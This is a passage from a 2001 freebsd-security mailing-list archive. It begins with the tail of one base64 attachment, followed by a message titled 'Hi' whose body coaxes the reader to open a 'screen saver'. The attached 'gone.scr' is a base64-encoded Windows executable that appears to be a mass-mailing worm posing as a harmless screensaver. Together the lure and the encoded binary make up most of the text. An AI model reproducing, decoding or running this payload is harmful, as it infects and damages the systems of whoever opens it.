NjAuRExMAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAARXhpdFByb2Nlc3MAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

------_=_NextPart_000_01C17D08.DEB57990--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4 13:28:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1])
	by hub.freebsd.org (Postfix) with ESMTP id 6C04F37B78B
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 13:24:07 -0800 (PST)
Received: from wolf.isltd.insignia.com (wolf.isltd.insignia.com [172.16.1.3])
	by highland.isltd.insignia.com (8.11.3/8.11.3/check_local4.2) with ESMTP id fB4LO5g04912
	for <freebsd-security@freebsd.org>; Tue, 4 Dec 2001 21:24:05 GMT
Received: (from news@localhost)
	by wolf.isltd.insignia.com (8.9.3/8.9.3) id VAA09853
	for freebsd-security@freebsd.org; Tue, 4 Dec 2001 21:22:09 GMT
From: "Lucey, Bryan" <freebsd-security-local@insignia.com>
To: "local.freebsd.security" <local.freebsd.security@insignia.com>
Subject: Hi
Date: Tue, 4 Dec 2001 13:17:37 -0800
Message-ID: <F098252D3EC7D21191DB00A0C9337ECBD92194@exchange-us.isinc.insignia.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C17D09.195F53E0"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C17D09.195F53E0
Content-Type: text/plain

How are you ?
When I saw this screen saver, I immediately thought about you
I am in a harry, I promise you will love it!


------_=_NextPart_000_01C17D09.195F53E0
Content-Type: application/octet-stream;
	name="gone.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="gone.scr"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA9AHveeWEVjXlhFY15YRWN+n0bjXhhFY0QfhyNfmEVjZB+GI14YRWNUmlj
aHlhFY0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDANVFCjwAAAAAAAAAAOAADwELAQYA
AIAAAAAgAAAAwAEA8EwCAADQAQAAUAIAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABwAgAA
BAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAORhAgCcAAAAAFACAOQR
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGNvZGUAAAAA
AMABAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOB0ZXh0AAAAAACAAAAA0AEAAIAAAAAEAAAA
AAAAAAAAAAAAAABAAADgLnJzcmMAAAAAIAAAAFACAAAUAAAAhAAAAAAAAAAAAAAAAAAAQAAAwAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgCpqamurodRuVgxWwA+2b9/CH1h
EEBIC15ZwxU4uJId22TbT3yB7KQPAG6+T8461759B7gOjY0+/wAMAXaDZV4mKV44Li5eJX17Ii+Q
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
